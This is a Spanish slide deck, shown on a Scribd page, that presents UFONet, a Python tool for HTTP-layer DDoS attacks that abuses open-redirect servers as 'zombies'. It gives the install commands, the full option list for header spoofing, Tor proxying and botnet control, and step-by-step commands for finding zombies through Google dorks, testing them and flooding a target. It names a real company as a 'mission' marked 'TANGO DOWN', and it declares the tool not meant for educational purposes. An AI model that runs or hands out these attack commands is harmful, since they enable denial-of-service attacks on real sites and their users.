Scribd
Upload
174 views23 pages

UFONet v0.3 Abduction Spanish GSICK

UFONet is a Python tool for launching DDoS attacks via web abuse vectors like open redirects. It functions by searching for vulnerable "zombie" servers on the internet and using them to conduct HTTP floods against a target. The document provides information on how UFONet works, how to install and use it, examples of searching for zombies and attacking a target, and discusses plans for continued development.

Uploaded by

gofran188
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
174 views23 pages

UFONet v0.3 Abduction Spanish GSICK

UFONet is a Python tool for launching DDoS attacks via web abuse vectors like open redirects. It functions by searching for vulnerable "zombie" servers on the internet and using them to conduct HTTP floods against a target. The document provides information on how UFONet works, how to install and use it, examples of searching for zombies and attacking a target, and discusses plans for continued development.

Uploaded by

gofran188
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 23

===============================================

UFONet
Ataques DDoS va Web Abuse
2013/2014
por psy
===============================================
http://ufonet.sf.net

Edicin: GSICKMINDS 2014

===============================================

WARNING !!!!
Nombre: Coltn
Composicin:
-Columbita; FeMn+Nb2O6 (xido de niobio)
-Tantalita; FeMn+Ta2 (xido de tntalo)
Relevancia: Condensador electroltico
Uso: Telefona mvil, computadoras, implantes mdicos, armamento...
Problemtica:
-

Congo 82% reserva mundial (Grandes Lagos).


Prolifera entre uranio, torio y radio (radioactividad).
Consideracin: recurso energtico no renovable, estratgico.
Guerra: Desde 1998. Aprx 5,7 Millones de vctimas.
* Ejrcito Patritico Ruands Ruanda Occidente.
* Occidente condona deuda Ruanda + crdito FMI y Banco Central.
- Precio: 1Tn = 400.000$ | 18 meses 250.000M$
- Salario: Media Congo 8/m | Minero: 42/m

===============================================

Edicin: GSICKMINDS 2014

===============================================

WANTED:
ID: Paul Kagame (23/10/1957)
Cargo: Presidente de Ruanda
CV:
- Fundador Frente Patritico Ruands
- Jefe de inteligencia militar: ERN
- Entrenamiento: Fort Leavenworth(USA)
Crmenes:
- rden asesinato: Juvnal Habyarimana(Ruanda)
- rden asesinato: Cyprien Ntaryamira(Burundi)
- Dirigir genocidio desde 1994
Prodecimiento:
25/09/2003:
14/11/2003:
21/01/2005:
06/02/2008:
30/10/2014:

Recibe inmunidad diplomtica


Carla Del Ponte(SUI), fiscal TIDH -> destituda
Stephen Rapp(USA), fiscal de OBAMA toma el cargo
Proceso abierto por crmenes contra la humanidad(pdf)
En libertad

===============================================

Edicin: GSICKMINDS 2014

===============================================

MISIN:

foxconn.com

RealNick: Hon Hai Precision Industry Co.(TAI)


Dueo: Terry Guo aka Gou Tai-ming
Informacin:
Mayor productor mundial de aparatos electrnicos
Contratos:
*BlackBerry *iPad, *iPhone, *Kindle, *Playstation4
*Xbox One, *Wii U

Clientes:
Acer Inc.(TAI)
Amazon.com(USA)
Apple Inc.(USA)
BlackBerry Ltd.(CAN)
Cisco(USA)
Dell(USA)
Google(USA)
Hewlett-Packard(USA)

Microsoft(USA)
Motorola Mobility(USA)
Nintendo(JPN)
Nokia(FIN)
Sony(JPN)
Toshiba(JPN)
Vizio(USA)

===============================================

Edicin: GSICKMINDS 2014

===============================================

STATUS:

TANGO DOWN ! ;-)


===============================================

===============================================

UFONet
Ataques DDoS va Web Abuse
2013/2014
por psy
===============================================
http://ufonet.sf.net

Versin actual (05/10/2014): v0.3.1b - Abduction

===============================================
* Qu es UFONet?
* Cmo funciona?
* Instalacin
* Caractersticas
* Ejemplos de uso
* Ataque Simulado
* Siguiente versin
* Cmo contribuir?
===============================================

'Top 10' riesgos en aplicaciones: OWASP 2013

/Qu es UFONet?/
===============================================
+ Herramienta automtica para lanzar ataques DDoS
+ Escrita en python / GPL v3.0
+ Primera versin:
- Nacida como modulo de XSSer (2009)
- Lanzada: v0.1b 2013
+ Explota la Capa 7 (HTTP/Web Abuse)
- Vectores Open Redirect
OWASP: Top 10 2013-A10-Unvalidated Redirects and Forwards
+ Objetivo Agotamiento de recursos (DoS)

===============================================

Vdeo (v0.1b): UFONet PoC

/Cmo funciona?/
===============================================
+ CWE-601: URL Redirection to Untrusted Site
Una aplicacin web acepta una entrada controlada
por el usuario, que especifica un enlace a
un sitio web externo y ste, utiliza ese enlace
para una redireccin.
+ OWASP: URL Redirector Abuse
Una aplicacin acepta URLs arbitrarias definidas
por el usuario, que luego se utilizan como
objetivos para la redireccin. Los usuarios pueden
ser reconducidos, sin saberlo, a un sitio malicioso
desde otro de confianza.
Ej: Ataques de Phising

===============================================

Vdeo (v0.3b/DE): DDoS-Angriff ber Validatoren

/Cmo funciona?/
===============================================

===============================================

Cdigo: git clone https://github.com/epsylon/ufonet

/Instalacin/
===============================================
UFONet funciona en diferentes plataformas.
- GNU/Linux / Win32 / OSX
Requiere:
- Python (~2.7.x)
- python-pycurl - Python bindings to libcurl
En sistemas basados en Debian (ej: Ubuntu):
~$ sudo apt-get install python-pycurl

===============================================

Ver comandos: $ ufonet -h / --help

/Caractersticas/
===============================================
+ Modularidad:
- Cdigo escrito desde 0 (Limpio)
+ Proxy: (ej: Tor)
- Maestro Proxy Proxy(Zombie) Objetivo
+ Spoofing: (Cabeceras HTTP)
- User-Agent/Referer/Host/X-Forwarded-For/...
+ Controlador de la Botnet:
- Buscar 'zombies' en Internet
- Probar las vulnerabilidades (Open Redirect)
+ Impacto: Peticin(es) / Evadir cache en objetivo/...

===============================================

Primera versin: 18.06.2013

/Caractersticas/
===============================================
--version
-v, --verbose
--check-tor
--update

show program's version number and exit


active verbose on requests
check to see if Tor is used properly
check for latest stable version

*Configure Request(s)*:
--proxy=PROXY
Use proxy server (tor: http://localhost:8118)
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER
Use another HTTP Referer header (default SPOOFED)
--host=HOST
Use another HTTP Host header (default NONE)
--xforw
Set your HTTP X-Forwarded-For with random IP values
--xclient
Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT
Select your timeout (default 30)
--retries=RETRIES
Retries when the connection timeouts (default 1)
--delay=DELAY
Delay in seconds between each HTTP request (default 0)
*Manage Botnet*:
-s SEARCH
--sn=NUM_RESULTS
-t TEST

Search 'zombies' on google (ex: -s 'proxy.php?url=')


Set max number of result to search (default 10)
Test list of web 'zombie' servers (ex: -t zombies.txt)

*Configure Attack(s)*:
-r ROUNDS
Set number of 'rounds' for the attack (default: 1)
-b PLACE
Set a place to 'bit' on target (ex: -b /path/big.jpg)
-a TARGET
Start a Web DDoS attack (ex: -a http(s)://target.com)

===============================================

Regalo zombie: pastebin

/Ejemplos de uso/
===============================================
+ Bsqueda de 'zombies'
UFONet buscar en los resultados de google
1- Buscar resultados:
Ej: ./ufonet -s 'proxy.php?url=' --sn '100'
'checklink?uri='
'validator?uri='
2- Probar validez:
Wanna check if they are valid zombies? (Y/n)
3- Actualizar lista:
Wanna update your list (Y/n)

===============================================

Documentacin: README

/Ejemplos de uso/
===============================================
+ Probar la botnet
UFONet probar las vulnerabilidades 'Open Redirect'
http://target.com/check?uri=<PAYLOAD>
Ej: ./ufonet -t zombies.txt
1- Estn vivos?:
HTTP HEAD Check:
- Desde maestro: RECUERDA -> PROXY!!!
- Desde fuera: downforeveryoneorjustme
2- Actualizar lista:
Wanna update your list (Y/n)

===============================================

Mayor ataque probado: 3439 zombies

/Ejemplos de uso/
===============================================
+ Atacando un objetivo
UFONet conducir los zombies hasta el objetivo
+ Nmero de rondas por zombie
Ej: -r 10 / -r 10000
+ Lugar para morder (Ej: Pelcula Flash, ...)
Ej: -b "/images/big_size_image.jpg"
------------------------------------------------------./ufonet -a http://target.com
* Round: Is target up?
Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

===============================================

All my zombies are belong to you ;-)

/Ataque Simulado/
===============================================
+ Desde maestro:
./ufonet -check-tor

===============================================

All my zombies are belong to you ;-)

/Ataque Simulado/
===============================================
./ufonet t zombies.txt

===============================================

All my zombies are belong to you ;-)

/Ataque Simulado/
===============================================
./ufonet -a http://myecoin.net -r 10000

===============================================

It's not just you! http://nsa.gov looks down from here

/Ataque Simulado/
===============================================
+ Desde objetivo:

===============================================

Irc.freenode.net / #ufonet

/Siguiente versin/
===============================================
+ Nombre: UFONEt v0.4b: Infection!
* Ideas:
-

POST
XML
Anti-IDS/NIDS
XSS/CSRF
Multithreading
HTTP Headers (rfc4229)
GUI/GTK+
Geomapping
Impacto visual
Estadsticas/Informes

- [...]

===============================================

Autor: [email protected] <> @psytzsche

/Cmo contribuir?/
===============================================
+ Desarrollo:
-

Testeo
Documentacin
Correccin de errores / Hacking ;-)
Propuestas/Ideas/Nuevas caractersticas

+ Soporte:
- Donaciones
BTC: 1Q63KtiLGzXiYA8XkWFPnWo7nKPWFr3nrc
ECO: 6enjPY7PZVq9gwXeVCxgJB8frsf4YFNzVp
- Promociones / Eventos / Trabajos ...
-

===============================================

sta herramienta NO es para propsitos educativos :-)

===============================================

===============================================

You might also like